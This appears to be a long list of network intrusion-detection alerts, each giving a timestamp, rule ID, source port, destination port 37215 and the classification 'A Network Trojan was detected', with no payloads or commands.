          Timestamp:06/09/24-16:33:11.034107
          SID:2829579
          Source Port:37470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990038
          SID:2835222
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102158
          SID:2829579
          Source Port:37354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166568
          SID:2829579
          Source Port:37048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952560
          SID:2829579
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299799
          SID:2835222
          Source Port:43662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029394
          SID:2829579
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.932501
          SID:2835222
          Source Port:51330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867027
          SID:2835222
          Source Port:42440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035849
          SID:2835222
          Source Port:41182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032747
          SID:2829579
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037813
          SID:2835222
          Source Port:56744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223352
          SID:2829579
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993532
          SID:2835222
          Source Port:42598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284922
          SID:2829579
          Source Port:36698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165971
          SID:2835222
          Source Port:41494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224348
          SID:2829579
          Source Port:55998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166289
          SID:2829579
          Source Port:60898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469746
          SID:2835222
          Source Port:48474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716883
          SID:2829579
          Source Port:52378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599509
          SID:2835222
          Source Port:52740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301115
          SID:2835222
          Source Port:54998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926912
          SID:2835222
          Source Port:59638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996260
          SID:2835222
          Source Port:34488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028316
          SID:2835222
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168122
          SID:2835222
          Source Port:45500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637911
          SID:2835222
          Source Port:54528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.723442
          SID:2835222
          Source Port:55484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948101
          SID:2835222
          Source Port:38366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719141
          SID:2829579
          Source Port:36044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036843
          SID:2835222
          Source Port:59292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996339
          SID:2835222
          Source Port:48128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103869
          SID:2829579
          Source Port:48042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419297
          SID:2829579
          Source Port:54040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469244
          SID:2829579
          Source Port:40574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162565
          SID:2835222
          Source Port:45836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079491
          SID:2835222
          Source Port:58658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478185
          SID:2829579
          Source Port:41914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398136
          SID:2835222
          Source Port:48150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289093
          SID:2829579
          Source Port:36666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719698
          SID:2829579
          Source Port:47026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948678
          SID:2829579
          Source Port:36822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075598
          SID:2829579
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929607
          SID:2835222
          Source Port:38206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929468
          SID:2835222
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904514
          SID:2829579
          Source Port:59624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.684637
          SID:2835222
          Source Port:47738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718501
          SID:2829579
          Source Port:60730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028445
          SID:2835222
          Source Port:45608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.266498
          SID:2829579
          Source Port:36800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012557
          SID:2835222
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.299050
          SID:2835222
          Source Port:42486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718883
          SID:2835222
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289775
          SID:2835222
          Source Port:43102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910418
          SID:2835222
          Source Port:40144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412920
          SID:2835222
          Source Port:50604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818573
          SID:2829579
          Source Port:45388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718153
          SID:2829579
          Source Port:52566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038205
          SID:2835222
          Source Port:58804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414318
          SID:2829579
          Source Port:53730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951941
          SID:2829579
          Source Port:39320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477593
          SID:2829579
          Source Port:59870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645519
          SID:2829579
          Source Port:35956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164382
          SID:2835222
          Source Port:51076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034791
          SID:2829579
          Source Port:38976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719512
          SID:2829579
          Source Port:53946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222696
          SID:2835222
          Source Port:50660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.551580
          SID:2835222
          Source Port:43354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400468
          SID:2835222
          Source Port:34166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206280
          SID:2829579
          Source Port:32872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222740
          SID:2835222
          Source Port:33554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012772
          SID:2829579
          Source Port:36774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163921
          SID:2835222
          Source Port:45754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161958
          SID:2835222
          Source Port:45040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167352
          SID:2829579
          Source Port:60060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399116
          SID:2835222
          Source Port:37574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284804
          SID:2829579
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130842
          SID:2835222
          Source Port:59532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247384
          SID:2829579
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643477
          SID:2829579
          Source Port:54428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283507
          SID:2829579
          Source Port:54162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867880
          SID:2829579
          Source Port:48394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168145
          SID:2829579
          Source Port:59492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033596
          SID:2829579
          Source Port:60212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222625
          SID:2829579
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223888
          SID:2829579
          Source Port:39450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469371
          SID:2835222
          Source Port:59470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415124
          SID:2829579
          Source Port:50482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167379
          SID:2835222
          Source Port:33008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223791
          SID:2829579
          Source Port:37358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868850
          SID:2829579
          Source Port:41992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.036254
          SID:2829579
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676094
          SID:2829579
          Source Port:40884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075722
          SID:2835222
          Source Port:33982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230778
          SID:2829579
          Source Port:51940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275948
          SID:2835222
          Source Port:58880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130991
          SID:2835222
          Source Port:56212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291417
          SID:2829579
          Source Port:41244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567382
          SID:2829579
          Source Port:38308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034974
          SID:2835222
          Source Port:51120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567579
          SID:2835222
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718561
          SID:2829579
          Source Port:57008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036172
          SID:2835222
          Source Port:39534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287424
          SID:2829579
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.688079
          SID:2835222
          Source Port:47716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926321
          SID:2829579
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168982
          SID:2835222
          Source Port:46064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038391
          SID:2835222
          Source Port:38834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719457
          SID:2835222
          Source Port:60818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129377
          SID:2835222
          Source Port:41018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465074
          SID:2835222
          Source Port:41720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103074
          SID:2829579
          Source Port:36948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291703
          SID:2829579
          Source Port:57392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397519
          SID:2829579
          Source Port:45428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.276678
          SID:2829579
          Source Port:36296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466293
          SID:2835222
          Source Port:47776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.077359
          SID:2829579
          Source Port:58660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033691
          SID:2835222
          Source Port:37440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989536
          SID:2835222
          Source Port:59202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716181
          SID:2829579
          Source Port:47670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037518
          SID:2829579
          Source Port:48134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557515
          SID:2829579
          Source Port:43444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990612
          SID:2829579
          Source Port:50494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281199
          SID:2835222
          Source Port:45512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414966
          SID:2835222
          Source Port:33924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691815
          SID:2835222
          Source Port:38622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033119
          SID:2835222
          Source Port:54556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305023
          SID:2829579
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645243
          SID:2835222
          Source Port:34338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288704
          SID:2829579
          Source Port:42470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598025
          SID:2835222
          Source Port:37068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105393
          SID:2829579
          Source Port:55158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715118
          SID:2829579
          Source Port:34944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474796
          SID:2835222
          Source Port:46286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922053
          SID:2829579
          Source Port:46262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287013
          SID:2835222
          Source Port:42458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073927
          SID:2829579
          Source Port:38010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.291256
          SID:2835222
          Source Port:37758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691869
          SID:2835222
          Source Port:57504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292323
          SID:2835222
          Source Port:49848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079084
          SID:2829579
          Source Port:58310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166548
          SID:2835222
          Source Port:59496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646157
          SID:2835222
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034537
          SID:2835222
          Source Port:52136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644051
          SID:2835222
          Source Port:46164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948204
          SID:2835222
          Source Port:45410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643333
          SID:2835222
          Source Port:60456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990137
          SID:2835222
          Source Port:51172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713662
          SID:2835222
          Source Port:60022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926275
          SID:2835222
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820169
          SID:2829579
          Source Port:51100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296904
          SID:2835222
          Source Port:37896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490334
          SID:2835222
          Source Port:33096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643741
          SID:2829579
          Source Port:54924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414885
          SID:2829579
          Source Port:60966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283668
          SID:2829579
          Source Port:53234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283658
          SID:2829579
          Source Port:58124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.712984
          SID:2835222
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074426
          SID:2835222
          Source Port:45256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159216
          SID:2829579
          Source Port:33138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206514
          SID:2835222
          Source Port:54942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925151
          SID:2829579
          Source Port:54846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917136
          SID:2835222
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947615
          SID:2835222
          Source Port:37788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715136
          SID:2829579
          Source Port:34996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413671
          SID:2835222
          Source Port:59140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292811
          SID:2835222
          Source Port:51312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719128
          SID:2835222
          Source Port:45664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929123
          SID:2835222
          Source Port:48828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.420077
          SID:2835222
          Source Port:58236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950038
          SID:2835222
          Source Port:59594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987222
          SID:2835222
          Source Port:54346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646189
          SID:2835222
          Source Port:46256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017418
          SID:2829579
          Source Port:34210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.984345
          SID:2829579
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952086
          SID:2835222
          Source Port:52168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916314
          SID:2835222
          Source Port:35958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119791
          SID:2829579
          Source Port:51546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076954
          SID:2829579
          Source Port:53554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864419
          SID:2835222
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929083
          SID:2829579
          Source Port:58980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998408
          SID:2829579
          Source Port:51916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158352
          SID:2835222
          Source Port:34614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902044
          SID:2835222
          Source Port:37148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721466
          SID:2829579
          Source Port:55628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860705
          SID:2835222
          Source Port:47630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720021
          SID:2829579
          Source Port:47000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993610
          SID:2829579
          Source Port:57132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396979
          SID:2829579
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038545
          SID:2835222
          Source Port:45096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085446
          SID:2835222
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029434
          SID:2829579
          Source Port:54316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284857
          SID:2835222
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904289
          SID:2829579
          Source Port:33594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539031
          SID:2835222
          Source Port:60936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822643
          SID:2829579
          Source Port:33390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901984
          SID:2829579
          Source Port:44758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467071
